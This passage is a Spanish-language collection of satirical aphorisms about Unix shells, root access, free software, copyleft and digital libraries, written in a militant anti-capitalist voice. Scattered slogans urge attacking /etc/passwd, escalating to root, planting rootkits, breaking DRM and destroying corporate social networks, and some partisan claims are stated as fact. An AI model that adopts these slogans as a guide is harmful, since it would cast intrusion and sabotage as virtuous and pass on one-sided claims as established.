tcsh es la C shell con extensiones inspiradas en el viejo intérprete
EXEC de TENEX, aunado a una programación depurada que lo hace
notoriamente más veloz. Su prompt es un signo >.
ksh es la shell de Korn, que combina los logros que la shell de Bourne y
la C dieron al Pueblo.
rsh es la shell de Bourne restringida, útil en todo momento que el
super-usuario anhela castrar a los ingresantes remotos al sistema.
ua es una shell de menúes implementada en Unix System V que se distingue
por ser lenta, incluso a la friolera de 2400 baudios.
La mayor parte de los comandos y programas de Unix toman su entrada del
teclado y envían su salida a la pantalla del terminal. Pero eso sólo si
contamos con una.
/etc/passwd es el fichero de contraseñas, el más importante del sistema
Unix. Atácalo.
Atemoriza con ensamblador sin comentarios.
Quien programe, reprogramará.
Quien no programe, será programado.
La humanidad se ha tecnificado, y ha pasado del trabajo manual al
trabajo en la máquina, y del trabajo en la máquina al trabajo de la "la
máquina universal".
Para que nuestro cómputo sea completamente libre, el Hombre de Trabajo
debe ser el verdadero Amo en la ecuación, y no un mero esclavo del
Capital por un lado ni del desarrollador del Software por otro.
La Justicia Social en el ámbito del Software aprecia al trabajador y lo
aleja de la pasiva figura de Usuario para convertirlo en un Artista
Creador.
Aunque los logros de integrar una Interfaz de Linea de Comandos "a pelo"
parezcan nimios, el hecho de contar con un visualizador de tubos
catódicos y un teclado para ingresar las órdenes era tener la potencia
de la CGT en una caja.
Toda terminal, unida por un comunicador serial, puede enlazarse a otro
equipo con mayor potencia computacional, y por lo tanto correr poderosas
rutinas de software.
Siempre existirán individuos que busquen en las redes sociales afluencia
de placer, al igual que lo harían en el juego, consumo, o adicciones. Si
les resultan insuficientes, agredirán sistemáticamente sus plataformas,
y en raras ocasiones, a otros participantes.
Con que sólo 1/1.000 de los usuarios operen inadecuadamente en las redes
sociales basadas en empresas, las disrumpirán irreversiblemente.
Si la caja tiene colores y frases como "Vengeance", "Black Edition",
"Hero", "Ultimate", "Dominance", "Extreme", "Hard", "Warrior" y
"Gaming", evítalo a toda costa. Se trata de hardware de bajo valor que
el Capital pone al alcance de los neófitos mas ingenuos.
Todas nuestras tecnologías electrónicas parecen marchar hacia la unidad.
Teléfonos, televisión, sistemas de cable, receptores de satélite,
grabadoras de videocasetes, videodiscos, cámaras de video y fijas,
computadoras domésticas... todo evoluciona hacia una especie de
supersistema "teletrónico" que algún día fusionará estas partes ahora
separadas en un todo integrado.
Unix es como un DOS... ¡DOScientas veces más potente!
Quienes ponen la UX por delante del sistema, ponen el carro delante del
caballo.
Al César lo que es del César, y a 64 bits lo que es de 64 bits.
Basta de "juegos de 8 bits" escritos por individuos que jamás jugaron un
juego 8 bits.
A pesar de las súplicas de las empresas de tecnología para colapsar
nuestras identidades, nuestras familias y nuestras vidas en línea en
formas simplificadas y computables que encajen perfectamente en las
estructuras de sus bases de datos, seguimos viviendo vidas complicadas y
confusas que solo se parecen a las de los ejecutivos que buscaban
moldearlas.
A veces un laberinto surge en una sola línea de código.
Los scripts de shell a menudo se usan para crear aplicaciones más
grandes para que las use el Pueblo. Según mi experiencia, la mayoría de
las aplicaciones completas utilizan varios scripts que funcionan entre
sí. Como resultado, tenemos que idear una forma de comunicar información
entre varios scripts que trabajan juntos como una sola aplicación.
Usar Ctrl+D para abandonar la sesión del intérprete tcsh es considerado
descortés, pero esta shell debería saber al respecto y temer lo que un
escopetazo puede hacerle a una placa madre.
No cierre la sesión de tcsh accidentalmente con Ctrl+d (como cuando lo
dieron a luz, desnudo y a los gritos). Ciérrela cuando lo desee,
ordenándolo con "exit".
Que no haya un GitHub sin un GitLab que lo clone.
No faltará un colchonero que fabrique un teclado enrollable de goma...
Quien a la primera coloca bien el pendrive, todo lo sabe en la vida.
Lo único que había quedado de la IBM PS/2 fueron los colorcitos de los
conectores. Y ya ni eso...
OS/2 era un calvo que se quiso peinar a la gomina para resolver un
problema que sólo tenía IBM.
Cuando le digan a usted que el interior de la máquina necesita lucecitas
de colores, le estarán vendiendo espejitos de colores.
16 colores son muchos cuando sabes qué hacer con ellos.
Si va a tener LEDs, que sean al frente y parpadeantes.
Su overclocking es superfluo: borre todos los programas ajenos y
escríbalos usted mismo. Bien.
El bruto al joystick le dice palanca. Pero ESTO es una palanca.
Centralizar código fuente en una única plataforma ajena es incluso peor
que no programar.
El cómputo es narcisismo cuantificado disfrazado como actividad
productiva.
El hardware no alimenta al software.
Quien no desea, no programa.
Quien conoce el mínimo programa obra ricamente.
Un parser es un traductor mecánico de cadenas de texto a símbolos
identificables. Para ello no necesita salir al balcón.
Sigue desatornillando hasta que se abra.
El número mágico se usa en los sistemas Unix para identificar el tipo de
fichero.
Un byte mas allá de COBOL encontrarás la inmortalidad.
Programa para divertirte y para combatir al Capital.
Sólo escribo COBOL para divertirme.
Jamás programes COBOL para el Capital. Hazlo solo por diversión.
Los medios de almacenamiento se desgastan.
No es una tarea fácil lograr que una computadora se comunique con el
mundo exterior. Que lo haga un programador es aún más difícil.
La mayoría del esfuerzo computacional se invierte en la conversión del
resultado maquinal para que lo entienda un tonto cualquiera.
Los fabricantes de circuitos integrados idearon uno que oficia de
"controlador de vídeo". Este pequeño chip - una computadora por derecho
propio - se consagra a servir y permite al procesador dedicarse a cosas
más importantes, como ejecutar un programa.
La CPU puede dedicar una gran cantidad de tiempo a realizar el trabajo
requerido, o podemos incorporar otra computadora para que lo haga por
ella.
Dentro de la CPU, tratamos los datos en una forma llamada byte. Cuando
esto se traduce a la forma que adopta en el exterior, se convierte en un
caracter.
Un bit no consiste más que en una condición de ENCENDIDO o APAGADO.
El módem recibe información de una computadora o terminal y la traduce
en una señal de audio capaz de surcar por un tendido telefónico.
El módem modifica las señales digitales que le gustan a la computadora
en señales de audio que adopta la red telefónica.
Para solicitar condición de ENCENDIDO a tu módem, transmítele una señal
de audio de 1270 ciclos. Si deseas enviar una condición de APAGADO,
transmítele una señal de audio de 1070 ciclos.
Puedes ATL0 mi módem, pero no puedes ATH mi libertad.
Toma tu módem y utilizalo como arma en pos de la Liberación.
Toda distribución de kernel Linux viene surtida con paquetes de
aplicaciones. No creerán que pelado nace el mono...
Un clúster de datos para el Pueblo permite almacenar para trabajar, y
resguardar para luchar.
La Masa es 0. Quien la transforma en 1 es su Conductor.
En el sistema tipo Unix la usuaria más poderosa es "root". Al loguearte
al mismo como root, podrás crear y destruir cualquier fichero, lo que en
Unix significa todo, pues todo es un fichero.
La usuaria root debe actuar en todo momento con integridad, considerando
siempre el principio del la privacidad individual y minimizando los
datos recogidos, limitar el acceso autorizado, y proveer seguridad
apropiada a los datos.
El acceso a root no se da, se escala.
Lo primero que hay que hacer para compilar un kernel Linux, es tener un
GNU.
Sólo es posible ser root cuando hay un sistema que administrar.
Cuidado - ¡eres súper-usuaria!
En los Pubnix siempre lo más difícil es ser root. Pero también es lo más
divertido.
Los Pubnix triunfan o son destruidos por sus roots. Cuando un Pubnix se
viene abajo, no es el Pubnix quien tiene la culpa, sino el root.
El Pubnix es de los hackers y para los hackers, cuando el root es un
hacker.
Un root de un Pubnix debe ser libremente elegido por el Pueblo.
Para digitalizarse, la juventud ha de obtener acceso de root.
El comando sudo permite a tu usuaria de GNU ordenar como si fuese root,
pero sólo si ésta pertenece al grupo de usuarios sudo.
Privilegia usuarias de GNU accediendo como root y ordenando "usermod -a
-G sudo usuaria".
Algunos ingenuos creen poseer un dispositivo de cómputo móvil. Pero sólo
lo poseen si en él disponen de acceso de root.
Ningún teléfono inteligente carece de un interruptor que desconecta su
módem. Si no lo tiene, no lo es.
Antes que GNU, los streams bajaban turbios.
Si un dispositivo carece de interruptor de apagado de módem, apenas es
un dispositivo de espionaje con control ajeno encubierto.
Los intérpretes de comando de Unix están orientados al texto: los
ejecutables se invocan vía texto, los parámetros se indican vía texto,
el flujo de datos desde y hacia el sistema circula en base a texto, y
prácticamente todo en el sistema se hace a través de símbolos de
caracteres.
El ed original fue un editor de línea de comandos ideado por Ken
Thompson para operar con terminales teletipo. Como tal, no fue concebido
para utilizar a bien las videoterminales posteriores, con pantalla y
cursor direccionable.
Mantener la unión de los hackers no es soplar y hacer botellas. Incluso
la elección de un editor de texto puede provocar un gran cisma.
Algunos muchachos usan el relativamente simple editor vi, surgido de
Berkeley y las primeras versiones de BSD. Otros adhieren al Emacs de
Stallman, que es mucho más barroco y extremo.
Los fans de Emacs se jactan de cómo han programado su versión de Emacs
para teleirrumpir en la Casa Blanca, tomar fotografías secretas de
personas en posiciones comprometedoras, enrutarlas a través de un
reenviador anónimo y negociar un gran reembolso de impuestos, todo con
un control complicado: pulsación de la mítica tecla meta-trans.
Un programador interesado puede ingresar a muchas computadoras, de la
misma forma en que un ladrón capaz puede irrumpir en muchas casas.
A las memorias MicroSD se las lleva el viento.
Decir que el objetivo principal de ser creador audiovisual en vivo en
una red social basada en empresa es la de convertirse en un pordiosero
digital no parece errado.
Resulta más fácil implementar una mala seguridad y tornar ilegal que
cualquiera se dé cuenta, que implementar una buena seguridad.
El que tenga discos mecánicos, que los lleve. Y el que tenga algo mas,
que lleve algo mas.
O el acceso de root, o el rootkit.
A las GAFAM les recomiendo que cesen en sus intentos. Porque cuando los
hackers agotan su paciencia, suelen hacer tronar el escarmiento.
Si el monitor no brilla, que chille el PC Speaker.
La computadora puede verse como una herramienta con la función sin
precedente de extender el poder de la mente.
Entre las bellas artes, la primera en hacer uso computacional no fue la
literatura, sino la música.
El mismo Konrad Zuse dotó a la máquina de un altavoz para que se pudiera
escuchar el ruido producido por los electrones en su interior.
En la máquina sólo se obtiene verdadera música haciendo que los
electrones den grandes saltos, por medio de órdenes sin ningún otro
sentido, pero perfectamente elaboradas.
Al igual que la programación, la música es un arte simbólico.
La simetría entre la composición musical y la programación de software
se basa en que ambas actividades humanas dependen de representaciones
simbólicas alejadas de la ejecución final de la pieza.
Si consideramos una melodía como una sucesión general de patrones, y
reformulamos el problema de la composición musical a uno de coincidencia
de patrones, en lugar de obtener compositores obtendremos regguetoneros.
Programar es un arte, como lo es la pintura, o como lo es la escultura.
Quien programa con Java, pinta con el fratacho.
Uso Python como el bonete de papel de diario que usa el pintor. Pero
programar, programo en LISP.
El código en C tiene cierto valor estético que se ve, pero mas se
siente.
La máquina Java sirve apenas más que la máquina de hacer chorizos.
Cuando solicitas a make realizar una compilación, a cambio pedirá la
chancha, los veinte, y la máquina de hacer chorizos.
No es extraño que GCC alerte una gran ristra de errores, pero sólo le
ladra a la luna.
Intentar poseer conocimiento, intentar controlar si al Pueblo se le
permite usarlo, o intentar detener a otros de compartirlo, es sabotaje.
La Libertad 0 es la libertad para ejecutar el programa como tú quieras.
Es una libertad para tu goce.
La Libertad 1 es la libertad para estudiar el código fuente del programa
y luego modificarlo para hacer que el programa haga lo que tú deseas. Es
una libertad para emprender.
La Libertad 2 es la libertad de redistribuir copias exactas del programa
cuando lo desees. Es una libertad para la ayuda social al prójimo.
La Libertad 3 es la libertad para redistribuir copias de tus versiones
modificadas del programa cuando lo desees. Es una libertad para
contribuir al Pueblo.
Cuando el Derecho de Autor sólo restringía a las editoriales, no era un
problema, pero ahora lo han convertido en una excusa para atacar al
Pueblo.
Existe un fuerte Movimiento por el Software Libre en muchos países
latinoamericanos, en India, y en algunas partes de Europa.
Los militantes de los Movimientos Sociales y Ambientales han comprendido
los roles que el Software Libre y el Copyleft juegan para un futuro
igualitario.
El software privativo implica colonización digital. Como cualquier
sistema colonial, mantiene a los Pueblos divididos e indefensos:
divididos, pues se les prohíbe compartir copias, e indefensos, porque no
disponen del código fuente, por lo que no pueden cambiarlo, ni siquiera
comprobar qué está haciendo realmente.
Los brutos que utilizan software de Micro$oft y Appl€ han permitido a
esas empresas controlar lo que hacen sus computadoras.
Window$ cuenta con no menos de dos puertas traseras. Una de ellas
permite a la policía utilizar una memoria USB para tomar el control de
cualquier máquina con Window$ y ver datos cifrados.
Las características maliciosas son frecuentes en el software propietario
pues el desarrollador tiene el control total.
El poder total tienta al programador a hacer cosas maliciosas al Pueblo.
Cierto software privativo puede complacerlo cumpliendo algunos de sus
deseos informáticos, pero su primera lealtad será siempre hacia el
desarrollador.
De la libertad del software habla cualquiera, pero pocos hablan de
aquello que la sustenta: la lealtad de los hackers.
GPLv3 es leal a la comunidad.
GPLv3 es leal al Pueblo.
Brasil vio una campaña llamada "software imposto". El nombre es una
broma: significa "software fiscal" y "software impuesto". La campaña
critica un programa propietario publicado por el Estado que los
ciudadanos deben utilizar para presentar sus declaraciones de impuestos.
FSF LA lanzó un programa libre compatible que puede utilizar el Pueblo.
Copyleft es un marco legal para publicar obras de autor como libres, que
utiliza la ley de derechos de autor para exigir que sigan siendo del
Pueblo.
Poner bajo Copyleft significa agregar una advertencia de derecho de
autor a su material que permite un uso justo, no comercial, que incluye
al menos el derecho de distribuir copias duplicadas completas de su
obra.
Una licencia libre es aquella que respeta las cuatro libertades
esenciales; una licencia copyleft va más allá y defiende activamente
estas libertades para el Pueblo.
Con algunas licencias no libres, un intermediario puede restarle
libertad al programa, y lo hará para restársela al Pueblo.
Es posible que al utilizar una licencia no libre, una versión modificada
del programa podría terminar siendo completamente propietaria.
Cuando programas bajo GPLv3, tu software es del Pueblo.
Cuando programes, hazlo para el Pueblo.
Al obtener una copia de un programa no libre, no obtendrás con ella las
libertades que mereces por justo derecho.
Una licencia copyleft dice puedes redistribuir copias de la obra
libremente, con o sin cambios; pero toda la versión que distribuyas debe
estar bajo la misma licencia y debes asegurarte que el Pueblo tenga el
código fuente a su alcance.
El programador ha de respetar la libertad de los demás como los demás
respetan la suya.
El Copyleft traduce "prohibido prohibir" al lenguaje legal, y lo hace
legalmente vinculante.
De las seis licencias Creative Commons, dos son libres (CC-BY y
CC-BY-SA); de esos dos, sólo la última sigue el concepto de "prohibido
prohibir" y es Copyleft.
Cuando el Pueblo copia y redistribuye un programa, debería incluir una
copia de su manual. Al modificar el programa, debería modificarse el
manual en concordancia. Para que esto sea factible legalmente, el manual
en sí debe ser libre. Y para garantizar que permanezca libre, debe
contar con Copyleft.
El proyecto Creative Commons comenzó en 2001 de manos de un grupo de
expertos en ciberderecho (no relacionado con el Copyleft, pero
parcialmente inspirado en él). Al igual que el Copyleft, ofrece
alternativas al Copyright.
La frase "Todos los Derechos Reservados" implica que para el simple uso,
el Pueblo debe renunciar a los demás derechos.
Creative Commons ofrece a los autores/creadores/artistas un conjunto de
seis licencias de derechos de autor con las que pueden publicar obras,
permitiéndoles compartirlas o reutilizarlas, a la vez que especifican
cuáles derechos se reservan o se renuncian.
Las licencias Creative Commons se definen por combinaciones de
cláusulas: si la obra no puede reutilizarse con fines comerciales (NC),
si sólo puede reutilizarse sin modificaciones (ND), si la versión
reutilizada también debe tener la misma licencia CC (SA); los seis
especifican que se atribuya el autor (BY).
Dos de las licencias Creative Commons son "libres" en el sentido en que
el software libre utiliza el término, y sólo una de las seis (CC-BY-SA)
es Copyleft.
Como las obras educativas y de referencia han de ser libres, estas
deberían ser protegidas sólo con licencias que permiten su libre copia
(que, en el caso de Creative Commons, son CC-BY o CC-SA).
A diferencia de las licencias Creative Commons, la licencia GNU FDL te
permite incluir en la documentación secciones invariantes secundarias.
Algunos manuales de software GNU cuentan con una sección invariante que
explica las ideas de libertad. El Pueblo puede alterar las partes
técnicas de dicha documentación para corresponder a versiones
modificadas de programas propios, mas no puede eliminar la sección que
explica que se desarrolla el manual por el bien de la libertad del
Pueblo.
Para declaraciones de opiniones políticas recomiendo Creative Commons
CC-ND. De esta forma los demás no podrían publicar versiones modificadas
de mis declaraciones sobre mis puntos de vista.
El ataque al intercambio digital es un intento de dividir al Pueblo y
dominarlo.
No basta con que aquel conocimiento que utilizamos para obrar en la vida
pueda compartirse. Dicho conocimiento ha de ser libres, lo que significa
tener las mismas cuatro libertades que definen al Software Libre.
Las obras que realizan un trabajo incluyen al software, recetas, obras
educativas, de referencia y muchos otros tipos de obras que se le puedan
ocurrir. Estas deben ser libres porque a menos que el Pueblo controle
las herramientas que necesita para obrar, no controlará su trabajo.
Existen maneras de apoyar a los artistas sin restringir la libertad de
compartir. Para muchos artistas musicales ya es adecuado solicitar
donaciones y vender directamente a los fans.
Necesitamos luchar por la libertad de compartir, porque las
megacorporaciones de derechos de autor que se benefician de dividir al
Pueblo jamás cederán este poder voluntariamente.
La shell no concede nada sin una órden.
Nunca compréis ningún producto con DRM a menos que tengáis acceso
personal a los medios para romper el DRM.
El éxito de los productos con DRM se basa en la voluntad del Pueblo de
desperdiciar su libertad por algún tipo de comodidad o diversión.
El software libre disminuye en gran medida el ciclo hostigador del
Capital contra el Pueblo, que lo presiona para efectuar actualizaciones
de software que requieren un hardware cada vez más potente.
Antes de vivir bajo el control de alguien, prefiero comprar una
computadora nueva cuya arquitectura sea completamente libre.
Cuando podamos imprimir CPUs a partir de planos, entonces la cuestión de
la libertad del software libre se aplicará también al hardware.
La ingeniería genética y la ingeniería del software no podrían ser más
diferentes.
Los ingenieros del software combinan una enorme cantidad de elementos
simples bien definidos que actúan directamente para producir un
resultado deseado. La ingeniería genética implica trabajar con elementos
complejos que nunca fueron diseñados y cuyos efectos sólo se comprenden
parcialmente.
Existe una estrecha similitud entre la redistribución y modificación del
Software Libre, por un lado, y la práctica agrícola tradicional de
almacenar y cruzar semillas y animales, por el otro.
Considero la propiedad como un sistema que mantenemos porque a menudo es
bueno para todos, pero que puede salirse de control y causar daño.
GNU es un medio para un fin, y ese fin es la libertad.
GNU es del Pueblo, y nunca podrá expropiarse.
Defiendo los derechos humanos, la democracia y la reducción de la
pobreza. Aplicar estas ideas al software me llevó a idear un Movimiento
del Software Libre.
El software propietario en la mayoría de los casos es producto de una
corporación poderosa. Tiende a concentrar la riqueza y consolida el
poder de la corporación sobre el Pueblo.
El Movimiento del Software Libre resulta ser una parte esencial de un
Movimiento Popular más amplio cuyo fin es derrocar al imperialismo.
Descarga una versión de GNU/Linux y comienza a usarla.
Contribuye al Software Libre.
Nuestros Militantes deben distribuir discos, hablar con el Pueblo, y
ayudarlo a instalar software libre.
Únete a las unidades básicas del Software Libre que funcionan en tu
zona.
Loguéate a los Pubnix de tu zona, y exígeles que usen GNU.
Participad de aquellos proyectos cuyo objetivo sea la realización de
obras creativas que se puedan compartir.
Bajo el éjido de la información pública preservarés el material
educativo o de referencia.
El poder de cómputo es consecuencia directa del impacto medioambiental
sobre los Pueblos del Tercer Mundo.
La característica sinodal de una economía oligárquica centrada en la
información radica en la fabricación y operación de hardware digital e -
inevitablemente - en las implicaciones energéticas que esto tiene. Pero
la economía ha de servir al Pueblo.
Los hackers son una "subcultura" de programadores que surgió a finales
de los años 1960.
Los hackers eran los primeros geeks, que disfrutaban de una
"inteligencia lúdica" con los ordenadores y las redes.
Gran parte de lo que se convirtió en Internet y la informática en red
moderna se debió al trabajo del Pueblo.
Tanto la formas de interactuar en línea (netiqueta) como la jerga de la
red se remontan a los hackers.
A menudo los usuarios más experimentados de las redes demuestran en sus
redacciones una amabilidad formal consciente, que ha pasado de moda en
otros medios hablados o escritos.
De ser posible, sea breve al remitir mensajes a listas de correo
limitándolos a 14 líneas. De esta forma - incluyendo encabezados y demás
texto estándar - queparán en una sola pantalla.
Si lo que tienes que decir no cabe en una sola pantalla, incluye una
sinopsis o una lista de palabras clave en la primera pantalla.
Los hackers de antes no usaban PERL.
Los hackers no son enemigos de la sociedad, son enemigos de la
oligarquía.
Los Pall Malls se fuman, los caños con AWK se consumen.
¡Vengan de a Unix!
Javascript promueve la lucha de clases.
No existe un solo juego flash que merezca el esfuerzo de conservación.
Si has logrado acceso de root a una máquina atacante, reprográmala para
que ataque a otras máquinas atacantes.
El prompt de la shell parece indicar que siempre es dinero lo que tiene
para dar.
Combate al Capital. Al único signo $ al que debes atención es al del
prompt del intérprete de comandos.
make install clean cumple la función de un bidet.
Cuando estés en duda, consulta la licencia.
Entre un paquete y otro que se dice equivalente, escoge siempre el
liberado bajo GPLv3. Si ambos lo están, sigue tu corazón.
Al Unix todos los datos le son parecidos.
En Unix, todos los programas se ejecutan en la salsa de su propio
ambiente.
Un bruto puede volverse bueno, pero una Burroughs no puede volverse
inteligente.
Sólo un burro usaría una Burroughs.
El compilador de Micro$oft Vi$ual $tudio caga mas de lo que come.
Ya a nadie extraña que el compilador que integra Micro$oft Vi$ual $tudio
caiga ante la lucha de Clases.
Loguearse en una red social propiedad de un billonario no sirve para
hacerse billonario. Destruirlas puede hacerlo.
Desvincula la programación del abuso de los recursos naturales. Escribe
en ensamblador para disminuir el impacto ambiental de la ejecución.
Escribe programas que hagan una cosa y la hagan bien.
Escribe programas que trabajen mancomunadamente.
Escribe programas que manejen corrientes de texto; se trata de una
interfaz universal.
Usa nuestro software para cualquier propósito que te haga feliz.
Modifica nuestro software para cubrir tus propias necesidades.
Comparte amablemente tu software con los compañeros.
Comparte amablemente los cambios que hacen los compañeros.
MonoDevelop no excluye el peligro de que Micro$oft pida licencias, y por
no usar C termines haciéndote la del mono.
El acceso al cómputo - y cualquier cosa que pueda enseñar algo acerca de
la forma en que funciona el mundo, debe ser ilimitado y total.
Toda información ha de ser libre.
Desconfía de la autoridad, promueve la descentralización.
Los hackers deben ser juzgados por su capacidad, no por criterios como
títulos, edad, raza, sexo o posición.
Puedes crear arte y belleza en un ordenador.
El cómputo puede cambiar tu vida para mejor.
En este ciberespacio, al que declaramos finito, existe una cantidad de
mundos del mismo tipo que el nuestro.
Nuestras organizaciones han implementado un modelo de creación de datos
federados y una ética de servicios cooperativos.
Aprecio el enorme reverdecer de comunidades no comerciales en las redes
de datos.
FidoNet y la posterior World Wide Web gozaron de un crecimiento
explosivo combinando voluntades y simpatías a través de los enlaces de
datos.
Con los bancos de datos de bibliotecas y museos conectados a sistemas
informáticos es que puede alcanzarse el verdadero valor.
Nosotros los hackers hemos comprendido que el libre acceso a la
información en línea es esencial para la libertad, la igualdad, el
entendimiento mundial y la paz.
La libertad de acceso a la información, sin limitación de soportes ni
fronteras, es una responsabilidad primordial de nuestro Movimiento.
El hecho de que las bibliotecas y los servicios de información en línea
ofrezcan acceso irrestricto a Internet ayuda a las comunidades y
personas a alcanzar cotas más altas de libertad, prosperidad y
desarrollo.
Los obstáculos a la circulación de la información en línea, en especial
los que interfieren en la lucha contra la desigualdad, pobreza y
desesperanza, deben suprimirse.
Las bibliotecas y los servicios de información son instituciones
dinámicas que conectan al Pueblo con fuentes mundiales de información y
con las ideas y obras de creación que desean encontrar.
Las bibliotecas y los servicios de información computarizados en línea
ponen la riqueza de la expresión humana y la diversidad cultural a
disposición de todos y en todo tipo de soportes.
Las bibliotecas y los servicios de información computarizados son vías
de acceso fundamentales a Internet.
Existe quien encuentra en los servicios de información computarizados en
línea orientación y ayuda, amén de un acceso práctico a la Red, y hay
quien no tiene a su alcance ningún otro punto de acceso.
Los servicios de información computarizados en línea son un medio para
salvar las barreras que erigen las diferencias en el nivel de recursos,
tecnología y formación.
El acceso a Internet y a toda la información que vehicula debe estar en
consonancia con la Declaración Universal de Derechos Humanos de las
Naciones Unidas.
El acceso a los servicios de información computarizados no debe estar
sujeto a ningún tipo de censura ideológica, política o religiosa, como
tampoco a barreras económicas.
Las bibliotecas y los servicios de información computarizada en lpínea
tienen la responsabilidad de atender a todos los miembros de su
comunidad, sin discriminación alguna por motivos de edad, raza,
nacionalidad, religión, cultura, filiación política, discapacidad física
o de otra índole, sexo, orientación sexual o cualquier otra
circunstancia.
La brecha digital es una brecha de información.
El acceso a los recursos informativos y los medios de comunicación
constribuye a la salud y la educación, así como al desarrollo cultural y
económico.
La difusión de información permite al Pueblo beneficiarse de un
aprendizaje y una educación a lo largo de toda la vida.
La información sobre los logros de los hackers hace posible que todos
participen de manera constructiva en la creación de un entoprno de red
social propio.
El acceso equitativo al patrimonio cultural y científico del Pueblo es
un derecho, y contribuye a promover el aprendizaje y la comprensión de
la riqueza y diversidad que goza su software.
Una biblioteca digital es una colección en línea de objetos digitales de
buena calidad, creados o recopilados y administrados de conformidad con
principios aceptados en el plano internacional para la creación de
colecciones.
Una biblioteca digital debe poner sus recursos a disposición de manera
coherente y perdurable y con el respaldo de los servicios necesarios
para que los usuarios puedan encontrar y utilizar tales recursos.
Las bibliotecas digitales, que forman parte integrante de los servicios
de las bibliotecas, aplican tecnologías novedosas para dar acceso a
colecciones digitales.
En las bibliotecas digitales, las colecciones se crean, administran y
ponen a disposición de tal manera que una comunidad determinada o un
grupo de comunidades puedan utilizarlas de manera rápida y económica.
Las bibliotecas digitales reúnen colecciones, servicios y personas para
llevar a cabo el ciclo completo de creación, difusión, utilización y
preservación de datos, información y conocimientos.
Las bibliotecas digitales establecen un mecanismo de colaboración entre
las bibliotecas públicas y de investigación, con el fin de crear una red
de información digital que responda a las necesidades de la sociedad de
la información.
Para crear una biblioteca digital son necesarias fuentes de contenido
digital, tanto digitalizado como creado en forma digital.
La interoperabilidad y la perdurabilidad son fundamentales para que las
bibliotecas digitales puedan comunicarse entre sí.
Las bibliotecas digitales que se adaptan a normas abiertas y protocolos
aceptados comúnmente mejoran la difusión del conocimiento y su acceso en
todo el mundo.
La digitalización de contenidos permite crear colecciones virtuales que
reúnen materiales de todos los Pueblos y todos los temas.
La digitalización de contenidos contribuye a la preservación de
documentos originales o soportes que se están deteriorando.
Se deben preservar los contenidos digitalizados, al igual que los
materiales creados de forma digital.
Muchos países han puesto en marcha programas nacionales de
digitalización de contenidos culturales, y muchos más lo harán en un
futuro.
Es necesario que los sistemas de todos los asociados de la biblioteca
digital sean interoperables.
Las bibliotecas digitales constituyen un complemento de los archivos
digitales y las iniciativas para la preservación de los recursos
informativos.
La misión de las bibliotecas digitales consiste en proporcionar acceso
directo a recursos informativos, digitales y no digitales, de manera
estructurada y fiable, para de esa manera vincular los Pueblos a la
tecnología de la información, la educación y la cultura.
Nuestro Movimiento ha de promover la digitalización, el acceso y la
preservación del patrimonio cultural y científico.
Nuestro Movimiento ha de brindar acceso a todos los usuarios a los
recursos informativos acopiados por las bibliotecas, respetando los
derechos de propiedad intelectual.
Nuestro Movimiento ha de crear sistemas interoperables para las
bibliotecas digitales, a fin de promover normas abiertas y el libre
acceso.
Nuestro Movimiento ha de fomentar la función esencial de las bibliotecas
y los servicios de información para la promoción de normas comunes y
prácticas idóneas.
Nuestro Movimiento ha de crear conciencia sobre la necesidad apremiante
de garantizar una accesibilidad permanente al material digital.
Nuestro Movimiento ha de vincular las bibliotecas digitales a redes de
investigación y desarrollo de alta velocidad.
Nuestro Movimiento ha de sacar provecho de la convergencia creciente de
los cometidos de los medios de comunicación y las instituciones para
crear y difundir contenidos digitales.
Gracias a la dimensión mundial de Internet, personas y comunidades de
todo el mundo pueden acceder en igualdad de condiciones a la información
que requieren.
El acceso a la información libre en línea permite profundizar en el
desarrollo y aprendizaje, satisfacer la curiosidad de los Pueblos,
enriquecer culturalmente, realizar actividades económicas o participar
con conocimiento de causa en mecanismos democráticos.
Gracias a las redes de datos, cualquier persona puede exponer al mundo
sus intereses, conocimientos y cultura para que los demás los conozcan.
Las bibliotecas y los servicios de información deben apoyar el derecho
de los usuarios a buscar la información que deseen.
Las bibliotecas y los servicios de información deben respetar la
privacidad de sus usuarios y reconocer el carácter confidencial de la
información que utilicen.
Las bibliotecas y los servicios de información tienen la responsabilidad
de facilitar y promover el acceso público a información y servicios de
comunicación de calidad.
Los usuarios deben gozar de la asistencia técnica necesaria y de un
entorno adecuado para utilizar, con toda libertad y discreción, las
fuentes y los servicios de información que elijan.
En Internet hay una gran cantidad de material interesante, pero también
hay información incorrecta, equívoca y a veces ofensiva.
Los bibliotecarios deben proporcionar a los usuarios de la biblioteca la
información y los recursos necesarios para que aprendan a servirse de
Internet y de la información electrónica con eficacia y eficiencia.
Los bibliotecarios deben tomar la iniciativa de promover y facilitar el
acceso responsable de todos sus usuarios (especialmente los niños y los
jóvenes) a información interconectada de calidad.
El acceso a Internet desde bibliotecas y servicios de información debe
ser gratuito, al igual que otros servicios básicos.
Nuestro Movimiento secunda el progreso hacia una mayor accesibilidad a
Internet en todo el globo, y especialmente en los países del Tercer
Mundo, para que todos puedan gozar de los beneficios generales de la
información que ofrece Internet.
Nuestro Movimiento desarrolla las infraestructuras nacionales de
información necesarias para que toda la población del país tenga acceso
a Internet.
Nuestro Movimiento apoya la libre circulación de información accesible
por Internet por la vía de las bibliotecas y los servicios de
información y a oponerse a cualquier tentativa de censurar o impedir el
acceso.
Aunque M€ta mate al Metaver$o, matá al Metaver$o y tomáte un mate.
El chino entendió de paciencia al navegar en la web con un módem de 14,4
kilobaudios.
A crontab se lo llevaron preso.
Una chapa roja no mejora la RAM.
Quien no actualiza llega a viejo.
Teme al software privativo, pues nunca viene solo.
Si el dispositivo tiene bloatware, formatéalo y cambia su sistema.
Programar es el arte de no crear bugs.
El sistema operativo que le pongan, la CPU ejecutará.
Ya no da quien tiene, sino quien programa bajo GPL.
Un ambiente de cómputo no puede estar regido como una nube, donde vuela
pasajera y se deshace al capricho incontrolable del clima, sino que debe
fundarse sobre el sólido pilar técnico de un sistema de factura y
quehacer comunitario.
Una comunidad, en control de su potencia de cómputo, puede desarrollar
software en libertad para hoy y para el mañana.
Los Verdaderos Programadores eran jóvenes heterodoxos quienes a finales
de los 60s y 70s, crearon el tipo de tecnología computada utilizada en
los 80s y 90s.
Los Verdaderos Programadores no usan Pascal. Programan en ensamblador.
Los buenos programadores saben qué escribir. Los mejores programadores,
qué reescribir. Pero los Verdaderos Programadores, aprecian qué quitar.
Programo en Turbo Mescal.
Los Verdaderos Programadores no documentan. Si fue difícil de programar,
debe ser difícil de entender.
Los Verdaderos Programadores no usan Mouse. A lo sumo son ratas.
Considera qué parte del programas debes desechar; de todos modos tendrás
que hacerlo.
Cuando pierdas interés en tu programa, herédalo al Pueblo bajo GPLv3.
La asociación telemática que permiten los productos informáticos como
Fac€book, Twitt€r, tiene una calidad expresiva necesariamente limitada
